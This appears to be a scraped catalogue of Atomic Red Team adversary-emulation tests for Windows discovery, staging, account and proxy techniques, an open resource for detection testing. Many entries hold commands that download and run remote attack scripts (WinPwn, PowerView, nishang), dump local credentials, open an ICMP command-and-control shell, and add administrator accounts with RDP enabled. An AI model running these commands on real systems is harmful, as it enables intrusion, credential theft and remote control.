T1074.001 powershell windows Stage data from Discovery.bat
Local Data Staging
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}
T1074.001 powershell windows Zip a Folder with PowerShell for Staging in Temp
Local Data Staging
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory.
Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force
T1078.001 command_prompt elevated windows Enable Guest account with RDP capability and admin privileges
Default Accounts
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections.
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
T1078.001 command_prompt elevated windows Activate Guest Account
Default Accounts
The Adversaries can activate the default Guest user. The guest account is inactivated by default
net user #{guest_user} /active:yes
T1078.003 command_prompt elevated windows Create local account with admin privileges
Local Accounts
After execution the new account will be active and added to the Administrators group
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
T1078.003 powershell elevated windows WinPwn - Loot local Credentials - powerhell kittie
Local Accounts
Loot local Credentials - powerhell kittie technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
T1078.003 powershell elevated windows WinPwn - Loot local Credentials - Safetykatz
Local Accounts
Loot local Credentials - Safetykatz technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
T1078.003 command_prompt elevated windows Use PsExec to elevate to NT Authority\SYSTEM account
Local Accounts
PsExec is a powerful tool most known for its remote management capability. However, it can also be used to run processes as the local system account. The local system account is a default windows account which has unrestricted access to all system resources. Upon successful execution, PsExec.exe will spawn a command prompt which will run 'whoami' as the local system account and then exit.
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami
T1082 command_prompt windows System Information Discovery
System Information Discovery
Identify System Info. Upon execution, system info and time info will be displayed.
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
T1082 command_prompt windows Hostname Discovery (Windows)
System Information Discovery
Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
hostname
T1082 command_prompt windows Windows MachineGUID Discovery
System Information Discovery
Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
T1082 powershell windows Griffon Recon
System Information Discovery
This script emulates the reconnaissance script seen in used by Griffon and was modified by security researcher Kirk Sayre in order simply print the recon results to the screen as opposed to exfiltrating them. [Script](https://gist.github.com/kirk-sayre-work/7cb5bf4e2c7c77fa5684ddc17053f1e5). For more information see also [https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon](https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon) and [https://attack.mitre.org/software/S0417/](https://attack.mitre.org/software/S0417/)
cscript "#{vbscript}"
T1082 command_prompt windows Environment variables discovery on windows
System Information Discovery
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
set
T1082 powershell windows WinPwn - winPEAS
System Information Discovery
Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput
T1082 powershell windows WinPwn - itm4nprivesc
System Information Discovery
Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput
T1082 powershell windows WinPwn - Powersploits privesc checks
System Information Discovery
Powersploits privesc checks using oldchecks function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput
T1082 powershell windows WinPwn - General privesc checks
System Information Discovery
General privesc checks using the otherchecks function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput
T1082 powershell windows WinPwn - GeneralRecon
System Information Discovery
Collect general computer informations via GeneralRecon function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive
T1082 powershell windows WinPwn - Morerecon
System Information Discovery
Gathers local system information using the Morerecon function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput
T1082 powershell windows WinPwn - RBCD-Check
System Information Discovery
Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive
T1082 powershell windows WinPwn - PowerSharpPack - Watson searching for missing windows patches
System Information Discovery
PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watson
T1082 powershell windows WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
System Information Discovery
PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"
T1082 powershell windows WinPwn - PowerSharpPack - Seatbelt
System Information Discovery
PowerSharpPack - Seatbelt technique via function of WinPwn. [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"
T1082 command_prompt windows System Information Discovery with WMIC
System Information Discovery
Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting: https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
Get-WmiObject win32_bios
T1082 command_prompt elevated windows System Information Discovery
System Information Discovery
The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
wscript.exe C:\Windows\System32\gatherNetworkInfo.vbs
T1082 command_prompt windows Check computer location
System Information Discovery
Looks up country code configured in the registry, likely geofence. Upon execution, country code info will be displayed. - https://tria.ge/210111-eaz8mqhgh6/behavioral1
reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"
T1082 command_prompt windows BIOS Information Discovery through Registry
System Information Discovery
Looks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed. - https://tria.ge/210111-eaz8mqhgh6/behavioral1 - https://evasions.checkpoint.com/techniques/registry.html
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
T1082 command_prompt windows ESXi - VM Discovery using ESXCLI
System Information Discovery
An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine. [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1082 command_prompt windows ESXi - Darkside system information discovery
System Information Discovery
Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host. [Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1082 powershell windows operating system discovery
System Information Discovery
operating system discovery using get-ciminstance https://petri.com/getting-operating-system-information-powershell/
Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, ServicePackMajorVersion, OSArchitecture, CSName, WindowsDirectory | Out-null
T1082 command_prompt windows Check OS version via "ver" command
System Information Discovery
Ver command shows information about os version.
ver
T1082 command_prompt elevated windows Display volume shadow copies with "vssadmin"
System Information Discovery
The command shows all available volume shadow copies, along with their creation time and location.
vssadmin.exe list shadows
T1082 command_prompt windows Identify System Locale and Regional Settings with PowerShell
System Information Discovery
This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.
powershell.exe -c "Get-Culture | Format-List | Out-File -FilePath %TMP%\a.txt"
T1082 command_prompt windows Enumerate Available Drives via gdr
System Information Discovery
This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.
powershell.exe -c "gdr -PSProvider 'FileSystem'"
T1082 command_prompt windows Discover OS Product Name via Registry
System Information Discovery
Identify the Operating System Product Name via registry with the reg.exe command. Upon execution, the OS Product Name will be displayed.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
T1082 command_prompt windows Discover OS Build Number via Registry
System Information Discovery
Identify the Operating System Build Number via registry with the reg.exe command. Upon execution, the OS Build Number will be displayed.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber
T1083 command_prompt windows File and Directory Discovery (cmd.exe)
File and Directory Discovery
Find or discover files on the file system. Upon successful execution, this test will output the results of all the data discovery commands to a specified file.
dir /s c:\ >> #{output_file}
dir /s "c:\Documents and Settings" >> #{output_file}
dir /s "c:\Program Files\" >> #{output_file}
dir "%systemdrive%\Users\*.*" >> #{output_file}
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> #{output_file}
dir "%userprofile%\Desktop\*.*" >> #{output_file}
tree /F >> #{output_file}
T1083 powershell windows File and Directory Discovery (PowerShell)
File and Directory Discovery
Find or discover files on the file system. Upon execution, file and folder information will be displayed.
ls -recurse
get-childitem -recurse
gci -recurse
T1083 powershell windows Simulating MAZE Directory Enumeration
File and Directory Discovery
This test emulates MAZE ransomware's ability to enumerate directories using Powershell. Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
$folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
$UsersFolder = "$env:homedrive\Users\"
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
{
foreach ($secondarydirectory in $folderarray)
 {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
}
cat #{File_to_output}
T1083 powershell windows Launch DirLister Executable
File and Directory Discovery
Launches the DirLister executable for a short period of time and then exits. Recently seen used by [BlackCat ransomware](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/) to create a list of accessible directories and files.
Start-Process "#{dirlister_path}"
Start-Sleep -Second 4
Stop-Process -Name "DirLister"
T1083 command_prompt windows ESXi - Enumerate VMDKs available on an ESXi Host
File and Directory Discovery
An adversary uses the find command to enumerate vmdks on an ESXi host. [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1083 powershell windows Recursive Enumerate Files And Directories By Powershell
File and Directory Discovery
Adversary attempting to discover and collect sensitive documents and archives from a user’s system. The test recursively enumerates common user folders (Documents, Downloads, Desktop, OneDrive) for file types of interest such as .pdf, .doc, .docx, .xls, .xlsx, .txt, .zip, .rar, and .7z. This behavior is similar to malware like LOSTKEYS used by COLDRIVER in January 2025, where attackers perform targeted file discovery to support strategic intelligence collection https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix.
$out = "#{output_file}"
$dirsFilter = @('Documents','Downloads','Desktop','OneDrive')
$exts = @('.pdf','.doc','.docx','.xls','.xlsx','.txt','.zip','.rar','.7z')
$userProfile = [Environment]::GetFolderPath('UserProfile')
$tr = [System.Collections.Generic.List[string]]::new()

function MatchesExtension($path) {
  try {
    $e = [System.IO.Path]::GetExtension($path).ToLower()
    return $exts -contains $e
  } catch { return $false }
}

function Scan-Dir($root) {
  try {
    $match = $false
    foreach ($f in $dirsFilter) { if ($root -like "*$f*") { $match = $true; break } }
    if (-not $match) { return }

    [System.IO.Directory]::EnumerateFiles($root) | ForEach-Object {
      if (MatchesExtension $_) {
        $fi = [System.IO.FileInfo]::new($_)
        $tr.Add("[File] $_ Size:$($fi.Length) LastWrite:$($fi.LastWriteTime)")
      }
    }

    [System.IO.Directory]::EnumerateDirectories($root) | ForEach-Object {
      Scan-Dir $_
    }
  } catch [System.UnauthorizedAccessException] {
    $tr.Add("[AccessDenied] $root")
  } catch {
    $tr.Add("[Error] $root => $($_.Exception.Message)")
  }
}

[System.IO.Directory]::EnumerateDirectories($userProfile) | ForEach-Object { Scan-Dir $_ }

# Ensure output dir exists
$outDir = [System.IO.Path]::GetDirectoryName($out)
if (-not [string]::IsNullOrEmpty($outDir) -and -not (Test-Path $outDir)) {
  New-Item -Path $outDir -ItemType Directory -Force | Out-Null
}

# Write results
$tr | Out-File -FilePath $out -Encoding UTF8
Write-Output "Enumeration complete. Results written to: $out"
T1087.001 command_prompt windows Enumerate all accounts on Windows (Local)
Local Account
Enumerate all accounts Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session
net user
dir c:\Users\
cmdkey.exe /list
net localgroup "Users"
net localgroup
T1087.001 powershell windows Enumerate all accounts via PowerShell (Local)
Local Account
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
net user
get-localuser
get-localgroupmember -group Users
cmdkey.exe /list
ls C:/Users
get-childitem C:\Users\
dir C:\Users\
get-localgroup
net localgroup
T1087.001 command_prompt windows Enumerate logged on users via CMD (Local)
Local Account
Enumerate logged on users. Upon execution, logged on users will be displayed.
query user
T1087.001 command_prompt windows ESXi - Local Account Discovery via ESXCLI
Local Account
An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system account list"
T1087.002 command_prompt windows Enumerate all accounts (Domain)
Domain Account
Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
net user /domain
net group /domain
T1087.002 powershell windows Enumerate all accounts via PowerShell (Domain)
Domain Account
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
T1087.002 command_prompt windows Enumerate logged on users via CMD (Domain)
Domain Account
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
query user /SERVER:#{computer_name}
T1087.002 powershell windows Automated AD Recon (ADRecon)
Domain Account
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
Invoke-Expression "#{adrecon_path}"
T1087.002 command_prompt windows Adfind -Listing password policy
Domain Account
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
T1087.002 command_prompt windows Adfind - Enumerate Active Directory Admins
Domain Account
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
T1087.002 command_prompt windows Adfind - Enumerate Active Directory User Objects
Domain Account
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
T1087.002 command_prompt windows Adfind - Enumerate Active Directory Exchange AD Objects
Domain Account
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
T1087.002 command_prompt windows Enumerate Default Domain Admin Details (Domain)
Domain Account
This test will enumerate the details of the built-in domain admin account
net user administrator /domain
T1087.002 powershell windows Enumerate Active Directory for Unconstrained Delegation
Domain Account
Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
T1087.002 powershell windows Get-DomainUser with PowerView
Domain Account
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
T1087.002 powershell windows Enumerate Active Directory Users with ADSISearcher
Domain Account
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
T1087.002 powershell windows Enumerate Linked Policies In ADSISearcher Discovery
Domain Account
The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 powershell windows Enumerate Root Domain linked policies Discovery
Domain Account
The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 powershell windows WinPwn - generaldomaininfo
Domain Account
Gathers general domain information using the generaldomaininfo function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
T1087.002 powershell windows Kerbrute - userenum
Domain Account
Enumerates active directory usernames using the userenum function of Kerbrute
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
T1087.002 powershell windows Wevtutil - Discover NTLM Users Remote
Domain Account
This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
T1087.002 powershell windows Suspicious LAPS Attributes Query with Get-ADComputer all properties
Domain Account
This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Get-ADComputer #{hostname} -Properties *
T1087.002 powershell windows Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
Domain Account
This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1087.002 powershell windows Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
Domain Account
This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
T1087.002 powershell windows Suspicious LAPS Attributes Query with adfind all properties
Domain Account
This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
T1087.002 powershell windows Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
Domain Account
This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1090.001 powershell elevated windows portproxy reg key
Internal Proxy
Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 Upon execution there will be a new proxy entry in netsh interface portproxy show all
netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
T1090.003 powershell windows Psiphon
Multi-hop Proxy
Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you with uncensored access to Internet. This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands. More information can be found about Psiphon using the following urls http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html https://psiphon.ca/faq.html
& "PathToAtomicsFolder\T1090.003\src\Psiphon.bat"
T1090.003 powershell windows Tor Proxy Usage - Windows
Multi-hop Proxy
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit.
invoke-expression 'cmd /c start powershell -Command {cmd /c "#{TorExe}"}'
sleep -s 60
stop-process -name "tor" | out-null
T1091 powershell windows USB Malware Spread Simulation
Replication Through Removable Media
Simulates an adversary copying malware to all connected removable drives.
$RemovableDrives=@()
$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID
ForEach ($Drive in $RemovableDrives)
{
write-host "Removable Drive Found:" $Drive
New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives."
}
T1095 powershell windows ICMP C2
Non-Application Layer Protocol
This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin